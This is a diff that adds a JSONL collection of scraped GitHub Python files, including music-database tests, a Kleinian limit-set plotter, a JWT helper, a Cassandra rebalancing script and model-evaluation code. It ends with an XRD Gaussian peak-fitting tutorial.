diff --git "a/1725.jsonl" "b/1725.jsonl" new file mode 100644--- /dev/null +++ "b/1725.jsonl" @@ -0,0 +1,1874 @@ +{"seq_id":"28796880797","text":"#!/usr/bin/env python\n\n\"\"\" Class implementation of TestMelDBSqlite3Adapter\"\"\"\n\nimport unittest\n\nimport pytest\n\nfrom melospy.basic_representations.solo import *\nfrom melospy.input_output.esac_reader import *\nfrom melospy.input_output.mel_db_adapter_factory import *\nfrom melospy.input_output.mel_db_sqlite3_adapter import *\nfrom melospy.input_output.mel_db_sqlite3_adapter2 import *\nfrom melospy.input_output.read_sv_project import *\nfrom melospy.rootpath import root_path\nfrom melospy.tools.commandline_tools.dbinfo import *\n\nfrom tests.rootpath import *\n\ndef getDB(DB):\n dbpath= add_data_path(DB)\n if DB[0:3] == \"esac\":\n version = \"1\"\n else:\n version = \"2\"\n dbinfo = DBInfo.fromDict({'path': dbpath, \"use\": True, \"type\":\"sqlite3\", \"version\":version})\n return MelDBAdapterFactory(dbinfo).create()\n\nclass TestMelDBSqlite3Adapter( unittest.TestCase ):\n\n\n @pytest.mark.skip(reason=\"Irrelevant\")\n def testSpeed(self):\n #return\n with getDB(\"esac.db\") as mdb:\n\n start = time.process_time()\n for i in range(1, 100):\n try:\n esacSong = mdb.readSongs(i)\n except Exception as e:\n print(\"Error for melid = \", i)\n print(\"Read 100 songs in {} s\".format(round(time.process_time()-start, 3)))\n start = time.process_time()\n results = mdb.query(\"SELECT * FROM melody WHERE melid>=1 AND melid<=100\")\n #results = mdb.query(\"SELECT * FROM esac_info WHERE melid>=1 AND melid<=100\")\n #results = mdb.query(\"SELECT * FROM sections WHERE melid>=1 AND melid<=100\")\n print(\"Performed 3 queries in {} s\".format(round(time.process_time()-start, 3)))\n\n #@pytest.mark.skip(reason=\"DB-Path mismatch\")\n def testReadEsac(self):\n #return\n with getDB(\"esac.db\") as mdb:\n esacSong = mdb.readEsacSongs(2552)\n self.assertEqual(len(esacSong[2552]), 40)\n\n #@pytest.mark.skip(reason=\"DB-Path mismatch\")\n def testReadSolo(self):\n #return\n with getDB(\"wjazzd.db\") as mdb:\n song = mdb.readSolos(1)\n self.assertEqual(len(song[1]), 530)\n\n\n #@pytest.mark.skip(reason=\"DB-Path mismatch\")\n def testReadSongs(self):\n #return\n with getDB(\"wjazzd.db\") as mdb:\n song = mdb.readSongs(1)\n self.assertEqual(len(song[1]), 530)\n\n with getDB(\"esac.db\") as mdb:\n song = mdb.readSongs(1)\n self.assertEqual(len(song[1]), 60)\n\n @pytest.mark.skip(reason=\"Too long\")\n def testReadMelodies(self):\n #return\n start = time.process_time()\n with getDB(\"esac.db\") as mdb:\n esacSongs = mdb.readMelodies()\n print(len(esacSongs ))\n self.assertEqual(len(esacSongs), 7352)\n\n print(\"Read Esac melodies in {}s\".format(time.process_time()-start))\n\n @pytest.mark.skip(reason=\"Too long\")\n def testReadEsacMetadata(self):\n #return\n start = time.process_time()\n with getDB(\"esac.db\") as mdb:\n esacMeta = mdb.readEsacMetadata()\n self.assertEqual(len(esacMeta ), 7352)\n print(\"Read Esac metadata in {}s\".format(time.process_time()-start))\n\n @pytest.mark.skip(reason=\"Too long\")\n def testReadEsacSongs(self):\n #return\n start = time.process_time()\n print(\"Reading ESAC songs...\")\n with getDB(\"esac.db\") as mdb:\n esacSongs = mdb.readSongs()\n self.assertEqual(len(esacSongs), 7352)\n print(\"Read all Esac songs in {} s\".format(time.process_time()-start))\n\n #@pytest.mark.skip(reason=\"DB-Path mismatch\")\n def testReadSolos(self):\n #return\n timer = Timer()\n melids = [1, 2, 3]\n with getDB(\"omnibook.db\") as mdb:\n solos 
= mdb.readSolos(melids)\n            print(\"Read three solos in {} s\".format(timer.end()))\n            self.assertEqual(len(solos), 3)\n\n    @pytest.mark.skip(reason=\"Too long\")\n    def testReadBeattracks(self):\n        #return\n        timer = Timer()\n        melids = [1]\n        with getDB(\"wjazzd.db\") as mdb:\n            bt = mdb.readBeatTracks()\n            print(\"Read all beattracks in {} s\".format(timer.end()))\n            self.assertEqual(len(bt), 456)\n\n\n    @pytest.mark.skip(reason=\"Too long\")\n    def testReadSections(self):\n        #return\n        #path_to_db = self.getDBpath(\"wjazzd.db\")\n        timer = Timer()\n        melids = [17, 18, 114]\n        with getDB(\"wjazzd.db\") as mdb:\n            sect = mdb.readSections(with_parse = False)\n            print(\"Read all sections in {} s\".format(timer.end()))\n            self.assertEqual(len(sect), 456)\n\n            timer.start()\n            sect = mdb.readSections(sectType=\"PHRASE\")\n            print(\"Read phrase sections in {} s\".format(timer.end()))\n            self.assertEqual(len(sect), 456)\n\n            timer.start()\n            sect = mdb.readSections(melids)\n            print(\"Read sections for three melodies in {} s\".format(timer.end()))\n            self.assertEqual(len(sect), 3)\n\n            timer.start()\n            sect = mdb.readSections(melids, sectType=\"PHRASE\")\n            print(\"Read phrase sections for three melodies in {} s\".format(timer.end()))\n            self.assertEqual(len(sect), 3)\n\n    #@pytest.mark.skip(reason=\"OperationalError: no such table: sections\")\n    def testReadEsacSections(self):\n        #return\n        timer = Timer()\n        melids = [17, 18, 114]\n        with getDB(\"esac.db\") as mdb:\n            sect = mdb.readSections(with_parse=False)\n            print(\"Read all sections in {} s\".format(timer.end()))\n\n            timer.start()\n            sect = mdb.readSections(sectType=\"PHRASE\", with_parse=False)\n            print(\"Read phrase sections in {} s\".format(timer.end()))\n            timer.start()\n            sect = mdb.readSections(melids, with_parse=False)\n            print(\"Read sections for three melodies in {} s\".format(timer.end()))\n            self.assertEqual(len(sect), 3)\n            timer.start()\n            sect = mdb.readSections(melids, sectType=\"PHRASE\", with_parse=False)\n            print(\"Read phrase sections for three melodies in {} s\".format(timer.end()))\n            self.assertEqual(len(sect), 3)\n            timer.start()\n            sect = mdb.readSections(melids[0], sectType=\"PHRASE\", with_parse=False)\n            print(\"Read phrase sections for one melody in {} s\".format(timer.end()))\n            sect = mdb.parseSection(sect[melids[0]], \"PHRASE\")\n            self.assertEqual(len(sect), 7)\n\n    @pytest.mark.skip(reason=\"Too long\")\n    def testReadSoloMetadata(self):\n        #return\n\n        start = time.process_time()\n        with getDB(\"wjazzd.db\") as mdb:\n            solos = mdb.readSoloMetadata()\n            self.assertEqual(len(solos), 456)\n        print(\"Read all solo metadata in {}s\".format(time.process_time()-start))\n\n    @pytest.mark.skip(reason=\"Too long\")\n    def testReadDatabase(self):\n        #return\n        start = time.process_time()\n        with getDB(\"wjazzd.db\") as mdb:\n            solos = mdb.readDatabase()\n            self.assertEqual(len(solos), 456)\n        print(\"Read wjazzd database in {}s\".format(time.process_time()-start))\n\n    @pytest.mark.skip(reason=\"Too long\")\n    def testConstructor(self):\n        \"\"\" Initialize module \"\"\"\n        return\n        esac_reader = EsacReader(add_data_path(\"K0001.esa\"))\n        song = esac_reader.solo\n        ei = esac_reader.esacinfo\n        song.setMetadata(ei)\n        #print song\n        with getDB(\"esac_test.db\") as mdb:\n            mdb.createDatabase()\n            mdb.insertEsacSong(song, ei)\n            esacSong = mdb.readEsacSongs(1)\n            self.assertEqual(len(esacSong[1]), len(song ))\n\n        s = SVReader(add_data_path(\"SonnyRollins_TenorMadness_FINAL.sv\"))\n        svp = SVReaderParams(flexq = FlexQParams())\n        s.bundle(svp, normalize = False, diagnostic = False)\n        solo1 = 
s.solo\n        si = SoloInfo(performer = \"Sonny Rollins\", title=\"Tenor Madness\")\n        ti = TranscriptionInfo(fileNameSV = \"SonnyRollins_TenorMadness_FINAL.sv\")\n        ri = RecordInfo(artist = \"Sonny Rollins\")\n        ci = CompositionInfo(title = \"Tenor Madness\", composer = \"Sonny Rollins\")\n        smd = SoloMetaData(soloInfo = si, transcriptionInfo = ti, recordInfo = ri, compositionInfo = ci)\n        solo1.setMetadata(smd)\n\n        s = SVReader(add_data_path(\"BobBerg_Angles_FINAL.sv\"))\n        s.bundle(svp, normalize = False, diagnostic = False)\n        solo2 = s.solo\n        si = SoloInfo(performer = \"Bob Berg\", title=\"Angles\")\n        ti = TranscriptionInfo(fileNameSV = \"BobBerg_Angles_FINAL.sv\")\n        ri = RecordInfo(artist = \"Bob Berg\")\n        ci = CompositionInfo(title = \"Angles\", composer = \"Bob Berg\")\n        smd = SoloMetaData(soloInfo = si, transcriptionInfo = ti, recordInfo = ri, compositionInfo = ci)\n        solo2.setMetadata(smd)\n\n        with getDB(\"wjazzd_test.db\") as mdb:\n            mdb.createDatabase()\n            mdb.insertSolo(solo1)\n            mdb.insertSolo(solo2)\n            solo = mdb.readSolos(1)\n            #print len(solo[1]), len(solo1)\n            self.assertEqual(len(solo[1]), len(solo1))\n            solo = mdb.readSolos(2)\n            self.assertEqual(len(solo[2]), len(solo2))\n            soli = mdb.readDatabase()\n            self.assertEqual(len(soli), 2)\n            vals = mdb.getMelIDsByFilenameSV('%_FINAL.sv')\n            self.assertEqual(vals, [1, 2] )\n\n\"\"\" Run all unit tests \"\"\"\nif __name__ == '__main__':\n    alltests = unittest.TestSuite([unittest.TestLoader().loadTestsFromTestCase(TestMelDBSqlite3Adapter)])\n    unittest.main()\n","repo_name":"klausfrieler/melospy","sub_path":"tests/input_output/test_mel_db_sqlite.py","file_name":"test_mel_db_sqlite.py","file_ext":"py","file_size_in_byte":9685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10871581592","text":"\"\"\" A script to plot the limit set of a particular cusp group.\n\n    This is only as accurate as the riley.cusp_point() function allows (i.e. make sure you have\n    sacrificed the correct number of goats before running the script...).\n\n    The limit point seeds are the fixed points of the 0/1, 1/1, and 1/2 Farey words at the given cusp point.\n\n    Limit set is computed all at once and plotted with pyplot so if the numbers you try to run are too big\n    then you will run out of memory very quickly. 
Try cusps_shaded.py if this is bad.\n\n    Options to change:\n        p, q -- orders of the elliptic elements (set to mp.inf for the parabolic case)\n        r, s -- slope of the desired cusp\n        reps -- you should be able to run kleinian.limit_set_markov with reps set to this value.\n        depth -- maximum word length to compute orbits with\n\n    Output image filename is cusp_{r}_{s}_elliptic_{p}_{q}.png (in the current directory).\n\"\"\"\nfrom mpmath import mp\nimport kleinian\nimport matplotlib.pyplot as plt\nimport riley\nimport farey\nimport itertools\n\n# Orders of elliptics\np = 3\nq = 5\n\n# Cusp slope\nr = 1\ns = 2\n\nreps = 100000\ndepth = 20\n\n\n\n\nfilename = f'cusp_{r}_{s}_elliptic_{p}_{q}.png'\nmu = riley.cusp_point(p,q,r,s)\n\nalpha = mp.exp(2j*mp.pi/p)\nbeta = mp.exp(2j*mp.pi/q)\nX = mp.matrix([[alpha,1],[0,mp.conj(alpha)]])\nY = mp.matrix([[beta,0],[mu,mp.conj(beta)]])\n\nseeds = farey.fixed_points(0,1,mu,alpha,beta)\\\n      + farey.fixed_points(1,1,mu,alpha,beta)\\\n      + farey.fixed_points(1,2,mu,alpha,beta)\n\nls = kleinian.limit_set_markov([X,Y],mp.matrix(seeds),depth,reps)\n\ncolours = {-2: 'r', -1:'b', 1:'g', 2:'y'}\nprint((ls.rows,ls.cols))\nplt.scatter([mp.re(t[0]) for t in ls],[mp.im(t[0]) for t in ls],c=[colours[t[1]] for t in ls],s=.1,alpha=.1,marker='.',linewidths=0)\n\nplt.axis('equal')\nplt.axis([-2,2,-1,2])\nplt.tight_layout()\nplt.savefig(filename,dpi=2000)\nplt.show()\n","repo_name":"aelzenaar/riley","sub_path":"cusps.py","file_name":"cusps.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72650886452","text":"import jwt\nfrom flask import current_app as app\nfrom flask import jsonify\n\n\ndef get_admin_id(token):\n    '''\n    Function that, given a token, returns its id.\n    :param str token: the token.\n    :rtype: int\n    ''' \n    try:\n        payload = jwt.decode(token, app.config['SECRET_KEY'], \n                            algorithms=['HS256'])\n    except jwt.ExpiredSignatureError:\n        return jsonify('''Token expired'''), 401\n    except jwt.InvalidSignatureError:\n        return jsonify('''Signature verification failed'''), 401\n    return payload['id']\n    \n    \n    ","repo_name":"CarlosEspinoTimon/crm_service_old","sub_path":"backend/server/helpers/users_helper.py","file_name":"users_helper.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71570906932","text":"import os\n\nimport config\nfrom git import git_mv\nfrom msql import sqlfiles\nfrom msql.pattern import *\n\n\nclass RenameBranchSQLFiles:\n    def __init__(self, project_file):\n        if not project_file.loaded:\n            project_file.load()\n\n        self.project_file = project_file\n\n    def rename_branch_sql_files(self):\n        print(\"Rename [Update] SQL Files And Update Project File\")\n        u_num = self.__rename_sql_files(UPDATE_SQL_FILE_PATTERN)\n\n        print(\"Rename [Conversion] SQL Files And Update Project File\")\n        c_num = self.__rename_sql_files(CONVERSION_SQL_FILE_PATTERN)\n\n        print(\"Rename [Metric SQL] Files And Update Project File\")\n        m_num = self.__rename_sql_files(METRIC_SQL_FILE_PATTERN)\n\n        print(\"Update [CurrentVersion.txt] {0}\\{1}\\{2}\".format(u_num, c_num, m_num))\n        self.__update_current_version_files(u_num, c_num, m_num)\n\n    def __rename_sql_files(self, file_pattern):\n        num = sqlfiles.get_max_file_num(file_pattern.search_pattern)\n        for f in sqlfiles.get_branch_sql_files(file_pattern.branch_search_pattern):\n            num += 1\n            self.__rename_sql_file(f, file_pattern.output_file_format.format(num))\n        return num\n\n    def 
__rename_sql_file(self, src_name, dst_name):\n update_folder_path = os.path.join(config.BASE_DIR, config.PATH_SCHEMA_UPDATE_FOLDER)\n proj_src = os.path.join(config.PROJECT_PATH_SCHEMA_UPDATE_FOLDER, src_name)\n proj_dst = os.path.join(config.PROJECT_PATH_SCHEMA_UPDATE_FOLDER, dst_name)\n file_src = os.path.join(update_folder_path, src_name)\n file_dst = os.path.join(update_folder_path, dst_name)\n res = self.project_file.get_res(proj_src)\n if res is not None:\n git_mv(file_src, file_dst, cwd=config.BASE_DIR)\n self.project_file.rename(proj_src, proj_dst)\n else:\n raise Exception(\"[\" + proj_src + \"] is not a resource in project\")\n\n @staticmethod\n def __update_current_version_files(u_num, c_num, m_num):\n file_path = os.path.join(config.BASE_DIR, config.PATH_CURRENT_VERSION_TXT)\n with open(file_path, 'w') as f:\n f.write(\"{0}\\n{1}\\n{2}\".format(u_num, c_num, m_num))\n","repo_name":"chao-zhou/msql","sub_path":"msql/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17612111054","text":"import h5py, os\nimport numpy as np\nfrom six.moves import cPickle\nimport argparse\nimport tensorflow as tf\nimport model_zoo\n\n#-----------------------------------------------------------------\n\n\ndef get_data(path, dataset='test'):\n with h5py.File(path, \"r\") as f:\n x = f[\"/deepsea/\"+dataset+\"/features\"][:].astype(np.float32)\n y = f[\"/deepsea/\"+dataset+\"/labels\"][:].astype(np.float32)\n return x, y\n\n#-----------------------------------------------------------------\n\nmodel_names = ['deepsea', 'basset', 'deepsea_custom', 'basset_custom']\nactivations = ['relu', 'exponential']\ntrial = 0\n\n# set paths\nresults_path = '../results_deepsea'\nif not os.path.exists(results_path):\n os.makedirs(results_path)\n\n# load data\ndata_path = '../../data'\n\nfilepath = os.path.join(data_path, 'deepsea_dataset.h5')\nx_test, y_test = get_data(filepath, dataset='test')\n\n# get shapes\nN, L, A = x_test.shape\nnum_labels = y_test.shape[1]\n\n\nwith open(os.path.join(results_path, 'results.txt'), 'w') as fout:\n\n results = []\n for model_name in model_names:\n for activation in activations:\n tf.keras.backend.clear_session()\n # build model\n if model_name == 'deepsea':\n model = model_zoo.deepsea((L,A), num_labels, activation)\n elif model_name == 'danq':\n model = model_zoo.danq((L,A), num_labels, activation)\n elif model_name == 'basset':\n model = model_zoo.basset((L,A), num_labels, activation)\n elif model_name == 'deepatt':\n model = model_zoo.deepatt((L,A), num_labels, activation)\n elif model_name == 'cnn_att':\n model = model_zoo.cnn_att((L,A), num_labels, activation)\n elif model_name == 'cnn_lstm_trans_1':\n model = model_zoo.cnn_lstm_trans((L,A), num_labels, activation, num_layers=1)\n elif model_name == 'cnn_lstm_trans_2':\n model = model_zoo.cnn_lstm_trans((L,A), num_labels, activation, num_layers=2)\n elif model_name == 'cnn_lstm_trans_4':\n model = model_zoo.cnn_lstm_trans((L,A), num_labels, activation, num_layers=4)\n elif model_name == 'cnn_trans_1':\n model = model_zoo.cnn_trans((L,A), num_labels, activation, num_layers=1)\n elif model_name == 'cnn_trans_2':\n model = model_zoo.cnn_trans((L,A), num_labels, activation, num_layers=2)\n elif model_name == 'cnn_trans_4':\n model = model_zoo.cnn_trans((L,A), num_labels, activation, num_layers=4)\n elif model_name == 'deepsea_custom':\n model = model_zoo.deepsea_custom((L,A), num_labels, 
activation)\n            elif model_name == 'danq_custom':\n                model = model_zoo.danq_custom((L,A), num_labels, activation)\n            elif model_name == 'basset_custom':\n                model = model_zoo.basset_custom((L,A), num_labels, activation)\n            else:\n                print(\"can't find model\")\n                continue  # skip unknown model names instead of silently reusing the previous model\n            print(model_name + '_' + activation)\n\n            # compile model\n            auroc = tf.keras.metrics.AUC(curve='ROC', name='auroc')\n            aupr = tf.keras.metrics.AUC(curve='PR', name='aupr')\n            model.compile(tf.keras.optimizers.Adam(0.001), loss='binary_crossentropy', metrics=[auroc, aupr])\n\n            # load model params\n            name = model_name + '_' + activation + '_' + str(trial)\n            model_dir = os.path.join(results_path, name+'_weights.h5')\n            model.load_weights(model_dir)\n\n            # get test performance\n            test_results = model.evaluate(x_test, y_test, batch_size=100)\n            \n            # save results\n            fout.write(\"%s\\t%s\\t%.4f\\t%.4f\\n\"%(model_name, activation, test_results[1], test_results[2]))\n\n\n\n","repo_name":"p-koo/gradient_correction","sub_path":"test_all.py","file_name":"test_all.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41164378979","text":"from __future__ import division\nimport logging\nimport os\n\nfrom appscale.common.appscale_utils import ssh\nfrom appscale.common.constants import KEY_DIRECTORY\nfrom appscale.common.constants import LOG_FORMAT\nfrom subprocess import (CalledProcessError,\n                        check_output)\nfrom ..cassandra_env.cassandra_interface import NODE_TOOL\nfrom ..cassandra_env.cassandra_interface import KEYSPACE\n\n\n# The percentage difference allowed between an actual and ideal load.\nMAX_DRIFT = .3\n\n\nclass InvalidUnits(Exception):\n  \"\"\" Indicates an unexpected units value. \"\"\"\n  pass\n\n\ndef load_bytes(value, units):\n  \"\"\" Convert a human-friendly size to bytes.\n\n  Args:\n    value: A float containing a size.\n    units: A string specifying the units.\n  Returns:\n    An integer representing the number of bytes.\n  Raises:\n    InvalidUnits if the units string is not recognized.\n  \"\"\"\n  magnitudes = {'KiB': 1, 'MiB': 2, 'GiB': 3, 'TiB': 4}\n  if units not in magnitudes:\n    raise InvalidUnits('{} not a recognized unit'.format(units))\n  return int(value * 1024 ** magnitudes[units])\n\n\ndef get_status():\n  \"\"\" Return the cluster status in a structured way.\n\n  Returns:\n    A list of nodes represented by dictionaries.\n  \"\"\"\n  nodes = []\n  for line in check_output([NODE_TOOL, 'status', KEYSPACE]).splitlines():\n    fields = line.split()\n    if len(fields) != 8:\n      continue\n    nodes.append({\n      'state': fields[0],\n      'ip': fields[1],\n      'tokens': int(fields[4]),\n      'owns': float(fields[5][:-1])\n    })\n  return nodes\n\n\ndef get_ring():\n  \"\"\" Return the ring status in a structured way.\n\n  Returns:\n    A list of nodes represented by dictionaries.\n  \"\"\"\n  ring_output = check_output([NODE_TOOL, 'ring', KEYSPACE])\n  ring = []\n  index = 0\n  for line in ring_output.splitlines():\n    fields = line.split()\n    if len(fields) != 8:\n      continue\n\n    ring.append({\n      'index': index,\n      'ip': fields[0],\n      'status': fields[2],\n      'state': fields[3],\n      'load': load_bytes(float(fields[4]), fields[5]),\n      'token': fields[7]\n    })\n    index += 1\n\n  assert len(ring) > 0\n\n  # Calculate skew and diff for each node in ring.\n  ideal_load = sum(node['load'] for node in ring) / len(ring)\n  for index, node in enumerate(ring):\n    try:\n      node['skew'] = abs(node['load'] - ideal_load) / ideal_load\n    except ZeroDivisionError:\n      node['skew'] = 0\n    node['diff'] = abs(node['load'] - ring[index - 
1]['load'])\n\n return ring\n\n\ndef equalize(node1, node2):\n \"\"\" Move data from the node with a larger load to the other one.\n\n Args:\n node1: A dictionary representing a node.\n node2: A dictionary representing a neighbor of node1.\n \"\"\"\n keys = [key for key in os.listdir(KEY_DIRECTORY) if key.endswith('.key')]\n keyname = keys[0].split('.')[0]\n\n to_move = abs(node1['load'] - node2['load']) / 2\n mb_to_move = round(to_move / 1024 ** 2, 2)\n if node1['load'] > node2['load']:\n logging.info('Moving {} MiB from {} to {}'.format(\n mb_to_move, node1['ip'], node2['ip']))\n percentile = 100 - int((to_move / node1['load']) * 100)\n new_token = ssh(node1['ip'], keyname,\n 'appscale-get-token {}'.format(percentile),\n method=check_output).strip()\n repair = [new_token, node1['token']]\n cleanup_ip = node1['ip']\n else:\n logging.info('Moving {} MiB from {} to {}'.format(\n mb_to_move, node2['ip'], node1['ip']))\n percentile = int((to_move / node2['load']) * 100)\n new_token = ssh(node2['ip'], keyname,\n 'appscale-get-token {}'.format(percentile),\n method=check_output).strip()\n repair = [node1['token'], new_token]\n cleanup_ip = node2['ip']\n\n logging.info('Moving {} to {}'.format(node1['ip'], new_token[:60] + '...'))\n ssh(node1['ip'], keyname, '{} move {}'.format(NODE_TOOL, new_token))\n\n start = repair[0][:60] + '...'\n end = repair[1][:60] + '...'\n logging.info('Repairing {} to {}'.format(start, end))\n check_output([NODE_TOOL, 'repair', '-st', repair[0], '-et', repair[1]])\n\n logging.info('Cleaning up {}'.format(cleanup_ip))\n ssh(cleanup_ip, keyname, '{} cleanup'.format(NODE_TOOL))\n\n\ndef main():\n logging.basicConfig(format=LOG_FORMAT, level=logging.INFO)\n logging.info('Fetching status')\n status = get_status()\n\n # All nodes must have just one token.\n assert {node['tokens'] for node in status} == {1}\n\n # There must be more than one node up to balance.\n assert len([node for node in status if node['state'] == 'UN']) > 1\n\n # If all nodes own everything, a rebalance is not possible.\n assert {node['owns'] for node in status} != {float(100)}\n\n logging.info('Fetching ring')\n ring = get_ring()\n if max(node['skew'] for node in ring) < MAX_DRIFT:\n logging.info('All nodes within {}% of ideal load'.format(MAX_DRIFT * 100))\n return\n\n # Pick two neighboring nodes with the largest difference in load. If the\n # equalization process fails, try the next largest difference.\n ring_by_diff = sorted(ring, key=lambda node: node['diff'], reverse=True)\n for node in ring_by_diff:\n try:\n equalize(ring[node['index'] - 1], ring[node['index']])\n # If data has been moved, the load needs to be re-evaluated. 
Load gets\n      # updated after 90 seconds.\n      break\n    except CalledProcessError:\n      continue\n","repo_name":"HafeezRai/appscale","sub_path":"AppDB/appscale/datastore/cassandra_env/rebalance.py","file_name":"rebalance.py","file_ext":"py","file_size_in_byte":5287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23264131923","text":"import sys\nsys.path.append('player_classes')\nsys.path.append('games')\nfrom game_0_2 import Game\nfrom custom_player import CustomPlayer\n\ntests = [\n    {'seed': 0, 'winner': 2},\n    {'seed': 1, 'winner': 1},\n    {'seed': 2, 'winner': 2},\n    {'seed': 3, 'winner': 1},\n    {'seed': 4, 'winner': 1},\n    {'seed': 5, 'winner': 2},\n    {'seed': 6, 'winner': 2},\n    {'seed': 7, 'winner': 1},\n    {'seed': 8, 'winner': 1},\n    {'seed': 9, 'winner': 1}\n]\n\nfor test in tests:\n    players = [CustomPlayer(), CustomPlayer()]\n    random_seed = test['seed']\n\n    game = Game(players, random_seed)\n    game.run_to_completion()\n\n    desired_winner = test['winner']\n    assert(game.game_state['winner'] == desired_winner)","repo_name":"snowthesprite/space-empires","sub_path":"tests/test_game_level_0_2_random_seeds.py","file_name":"test_game_level_0_2_random_seeds.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10073348224","text":"\n\ndef check(name1, name2, p, q):\n    b1 = True\n    b2 = True\n\n    for i in range(p):\n        if name1[i] != name2[i]:\n            b1 = False\n            break\n        else:\n            b1 = True\n\n    for i in range(q):\n        if name1[len(name1)- i -1] != name2[len(name2)- i -1]:\n            b2 = False\n            break\n        else:\n            b2 = True\n\n    if b1 and b2:\n        return True\n    else:\n        return False\n\n\nn, p, q = map(int, input().split())\nnames = []\nfor i in range(n):\n    names.append(input())\n\nnames.sort()\n\nfor i in list(names):  # iterate over a snapshot so removals below do not skip entries\n    if i not in names:\n        continue\n    for j in names[names.index(i) + 1:]:\n\n        if i[0] != j[0]:\n            break\n        if check(i,j,p,q):\n            names.remove(j)\n\n\nprint(len(names))","repo_name":"mmdaz/my_solved_algorithm_problems","sub_path":"old-codes/snapp.py","file_name":"snapp.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10272518513","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Introduction to Peak Fitting in Python\n\n# So far you have been introduced to the python programming language, working with arrays, importing data, and doing simple curve fitting. In this tutorial we are going to apply those skills to peak fitting data to determine lattice spacing and peak intensity.\n# \n# After this tutorial you should be able to:\n# \n# Determine lattice spacing and intensity using gaussian peak fitting\n# Find lattice parameters to fit data to the (100) peak and the (200) peak \n# \n# We'll be using the same imports as our previous tutorials, with one important addition: a theta-to-Q function that makes it very easy to look at our data with respect to Q\n\n# In[4]:\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats\nfrom scipy.optimize import curve_fit\nimport pandas as pd\n\n\n# # Importing the Data\n# For this tutorial I already have a datafile of XRD data. 
This datafile is a stacked .csv where the first column is the value of 2-theta and subsequent columns are diffracted intensity for a variety of samples.\n# To import the data we're going to define a function \"csv_to_np\" which will use the read_csv function built into pandas to pull the data, and then convert it to a numpy array since we're already familiar with working with those.\n\n# First, it's worthwhile to make a function that will convert our data with respect to Q. The two_to_q function below takes in an array of 2-theta values and an X-ray wavelength 𝜆, and returns an array of Q values.\n\n# In[5]:\n\n\ndef two_to_q(two_theta, wave):\n    #two_theta is a 1D array of two_theta angles\n    #wave is the X-ray wavelength in angstroms\n    rad_theta = two_theta/2*np.pi/180\n    q = 4*np.pi*np.sin(rad_theta)/wave\n    return q\n\n\n# In[6]:\n\n\ndef csv_to_np(filename):\n    data = pd.read_csv(filename)\n    return(np.array(data))\n\nperov = csv_to_np('D1_MAPBIBr2_Xraydeg.csv')\n\n\n# In[ ]:\n\n\n# Exercise 5\n# find_nearest is assumed from an earlier exercise: it returns the index of the entry in an array closest to a value\ndef find_nearest(array, value):\n    return (np.abs(array - value)).argmin()\n\nwave = 1.5406 # assumed X-ray wavelength (Cu K-alpha) in angstroms -- substitute the wavelength used for your measurement\nq = two_to_q(perov[:,0], wave) # convert the 2-theta column to Q\nq_1 = 2.04 # This will be the lower limit for Q we'll consider\nq_2 = 2.15\nlimit1 = find_nearest(q, q_1) #First our lower limit\nlimit2 = find_nearest(q, q_2) #And then our higher limit\nq_sub = q[limit1:limit2] # We'll reduce the domain of Q\nperov_sub = perov[limit1:limit2,1:]\n\nq_linear = np.hstack((q_sub[0:10], q_sub[-11:-1])) #I'm taking the starting and ending values\nperov_linear = np.hstack((perov_sub[0:10,0], perov_sub[-11:-1,0])) #We'll use these to fit a straight line\nslope, intercept = np.polyfit(q_linear, perov_linear, 1) #Do linear fit\nback = slope*q_sub+intercept #Create background array of the form Background = Ax+B\n#print (back)\n\n#plt.plot(q_sub,perov_sub[:,1], 'r-',label='$MAPbIBr_2$')# plot minus background \n#Let's begin by getting our data ready to analyze\nperov_fit = perov_sub[:,0]-back #We'll begin by subtracting the background we calculated for this piece of data\n\n#Now let's define a function we'll want to fit to - this is analogous to the \"straight-line-model\" from tutorial 03\n#We'll call our function gaussian and it will calculate the expression described above\ndef gaussian(x, a, b, c): \n    return a*np.exp(-(x - b)**2/(2*c**2))\n\n#We'll also give an initial guess for our fits based off of a visual interpretation of our data\np0 = [45, 2.4, 2] #(height, center, width)\n\n#Use scipy.optimize.curve_fit to fit our desired data\npopt, pcov = curve_fit(gaussian, q_sub, perov_fit, p0)\n\n#To confirm our fits it's always nice to plot our model versus our data.\nplt.figure(figsize=(8,6)) #make plot larger\nplt.plot(q_sub,perov_fit,'r-', label='$MAPbIBr_2$') #plot subfield of data\nplt.plot(q_sub,gaussian(q_sub, *popt),'b--', label='Model') #plot best fit\nplt.xlabel('Q [$\\AA^{-1}$]',size=12) #Define x-axis label\nplt.ylabel('Intensity [a.u.]',size=12)#Define y-axis label\nplt.legend(loc=\"upper right\")#Put legend in upper right corner\n\n#FEEDBACK I'd consider how this builds off of 04 - is this an answer to exercise 5? If so should we incorporate it into tutorial 04\n#Make sure there is an opportunity for students to practice, maybe you want them to write pseudocode first? Write their own definition?\n#FEEDBACK I like the idea of this building to a multi-peak fitting scenario. Perhaps you want folks to fit a complicated\n#function with a single peak first, calculate the uncertainty, and then repeat with multiple gaussians? \n#FEEDBACK I think an alternative would be to make this an alternative peak fitting tutorial - i.e. 
